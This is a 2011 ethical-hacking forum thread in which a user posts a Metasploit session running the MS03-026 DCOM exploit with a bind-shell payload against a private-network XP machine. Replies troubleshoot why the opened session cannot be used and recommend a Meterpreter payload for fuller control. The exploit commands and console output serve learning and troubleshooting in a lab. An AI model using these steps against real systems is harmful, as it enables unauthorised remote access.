HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 39 guests and 1 member online
 
Advertisement

You are here: Home arrow Resourcesarrow Tutorialsarrow Help with Metasploit - Can't interact with open session on generic/shell_bind_tc
EH-Net
May 22, 2013, 02:07:47 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Help with Metasploit - Can't interact with open session on generic/shell_bind_tc  (Read 8810 times)
0 Members and 1 Guest are viewing this topic.
kali8ula
Newbie
*
Offline Offline

Posts: 1


View Profile
« on: May 01, 2011, 03:16:03 AM »
Hi Guys,

Would appreciate some help on this one, ive been doing some pen testing with BT4 on an XP SP2 workstation, and these are the results I get when using generic/shell_bind_tcp payload.
it seems that it opens up a session, but there it gets stuck, I can't get into CMD or do anything...
last line I get is "
  • Starting interaction with 4..." (Full code below)
Would appreciate any responses.

Thanks!

Code:

msf> use exploit/windows/dcerpc/ms03_
026_dcom
msf exploit(ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.209    yes       The target address
   RPORT  135              yes       The target port


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  135              yes       The listen port
   RHOST  192.168.1.209    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit -z

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Sending exploit ...
[*] Command shell session 4 opened (192.168.1.227:39153 -> 192.168.1.209:135) at Sat Apr 30 17:43:51 +0000 2011
[*] Session 4 created in the background.
msf exploit(ms03_026_dcom) > sessions -i 4
[*] Starting interaction with 4...
Logged
SephStorm
Hero Member
*****
Offline Offline

Posts: 530


View Profile WWW
« Reply #1 on: May 01, 2011, 04:08:13 PM »
Ive have similar issues when attacking W Vista and W7. I'm running under the assumption that the OS is actually patched.
Logged
Support my hactivities.
http://www.cafepress.com/TRUEHacker
xsurf
Newbie
*
Offline Offline

Posts: 13


View Profile
« Reply #2 on: May 02, 2011, 07:26:09 PM »
Hi,

Did you try with other payload ??
Logged
CCNA, SND
esojzuir
Newbie
*
Offline Offline

Posts: 36


View Profile
« Reply #3 on: May 02, 2011, 09:49:49 PM »
Quote from: kali8ula on May 01, 2011, 03:16:03 AM


Code:

msf> use exploit/windows/dcerpc/ms03_
026_dcom
msf exploit(ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.209    yes       The target address
   RPORT  135              yes       The target port


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  135              yes       The listen port
   RHOST  192.168.1.209    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit -z

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.209[135] ...
[*] Sending exploit ...
[*] Command shell session 4 opened (192.168.1.227:39153 -> 192.168.1.209:135) at Sat Apr 30 17:43:51 +0000 2011
[*] Session 4 created in the background.
msf exploit(ms03_026_dcom) > sessions -i 4
[*] Starting interaction with 4...

msf exploit(ms03_026_dcom) > exploit -z

The switch that you are using prevents you from interacting with any session after the exploit runs. Use exploit -h to see all options and you will find that -z prevents interaction. Also, why are you using generic bind? Use windows/meterpreter/bind_tcp which allows for full interaction with the victim, not just C:\ prompt.

I hope this helps.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.052 seconds with 24 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.